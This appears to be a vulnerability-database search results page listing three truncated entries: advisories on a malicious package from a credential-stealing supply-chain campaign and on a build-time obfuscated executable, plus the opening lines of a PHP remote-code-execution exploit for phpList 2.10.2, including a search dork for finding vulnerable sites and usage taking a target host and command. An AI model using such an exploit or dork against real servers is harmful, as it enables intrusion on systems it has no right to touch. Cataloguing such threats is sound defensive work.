3 matches found
Malicious Package
Overview: jsx-dev-runtime is a malicious package. This package was recognized as part of the 'PhantomRaven' supply chain campaign, which involves credential-stealing malware. The package impersonates well-known ecosystem plugins to deceive developers into installing it. Malicious Behavior: The...
Undesired Behavior
Overview: Affected versions of this package are vulnerable to Undesired Behavior. It contains a dependency on the SponsorLink package, which runs an obfuscated closed-source executable at build time. That executable spawns OS processes and performs network requests, including transferring a...
phpList 2.10.2 - 'GLOBALS[]' Remote Code Execution
!/usr/bin/php -q -d shortopentag=on this works against registerglobals=On \r\n"; echo "a dork: inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe"\r\n"; echo " -ubbi phplist\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host path cmd OPTIONS\r\n"; echo "host: target server...